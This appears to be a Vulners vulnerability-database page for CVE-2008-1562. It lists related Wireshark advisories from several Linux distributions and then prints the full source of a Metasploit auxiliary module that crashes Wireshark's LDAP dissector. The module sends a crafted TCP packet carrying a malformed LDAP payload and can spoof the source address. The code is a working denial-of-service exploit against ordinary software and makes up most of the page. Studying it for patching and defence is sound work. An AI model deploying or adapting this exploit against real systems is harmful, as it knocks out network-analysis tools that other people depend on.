| Reporter | Title | Published | Views | Family All 53 |
|---|---|---|---|---|
| Security fix for the ALT Linux 9 package wireshark version 1.0.1-alt1 | 2 Jul 200800:00 | – | altlinux | |
| CentOS 3 / 4 / 5 : wireshark (CESA-2008:0890) | 2 Oct 200800:00 | – | nessus | |
| Fedora 7 : wireshark-1.0.0-1.fc7 (2008-2941) | 11 Apr 200800:00 | – | nessus | |
| Fedora 8 : wireshark-1.0.0-1.fc8 (2008-3040) | 11 Apr 200800:00 | – | nessus | |
| GLSA-200805-05 : Wireshark: Denial of Service | 9 May 200800:00 | – | nessus | |
| Mandriva Linux Security Advisory : wireshark (MDVSA-2008:091) | 23 Apr 200900:00 | – | nessus | |
| MiracleLinux 3 : wireshark-1.0.3-4.1AXS3 (AXSA:2008-457:01) | 14 Jan 202600:00 | – | nessus | |
| MiracleLinux 3 : wireshark-1.0.3-4.1AXS3 (AXSA:2008-511:02) | 19 Jan 202600:00 | – | nessus | |
| Oracle Linux 5 : wireshark (ELSA-2008-0890) | 12 Jul 201300:00 | – | nessus | |
| RHEL 3 / 4 / 5 : wireshark (RHSA-2008:0890) | 2 Oct 200800:00 | – | nessus |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Capture
include Msf::Auxiliary::Dos
def initialize
super(
'Name' => 'Wireshark LDAP Dissector DOS',
'Description' => %q{
The LDAP dissector in Wireshark 0.99.2 through 0.99.8 allows remote attackers
to cause a denial of service (application crash) via a malformed packet.
},
'Author' => ['MC'],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2008-1562' ],
[ 'OSVDB', '43840' ],
],
'DisclosureDate' => 'Mar 28 2008')
register_options([
OptInt.new('RPORT', [true, 'The destination port', 389]),
OptAddress.new('SHOST', [false, 'This option can be used to specify a spoofed source address', nil])
])
deregister_options('FILTER','PCAPFILE')
end
def run
open_pcap
print_status("Sending malformed LDAP packet to #{rhost}")
m = Rex::Text.rand_text_alpha_lower(3)
p = PacketFu::TCPPacket.new
p.ip_saddr = datastore['SHOST'] || Rex::Socket.source_address(rhost)
p.ip_daddr = rhost
p.tcp_ack = rand(0x100000000)
p.tcp_flags.syn = 1
p.tcp_flags.ack = 1
p.tcp_dport = datastore['RPORT'].to_i
p.tcp_win = 3072
p.payload = "0O\002\002;\242cI\004\rdc=#{m},dc=#{m}\n\001\002\n\001\000\002\001\000\002\001\000\001\001\000\241'\243\016"
p.recalc
capture_sendto(p, rhost)
close_pcap
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation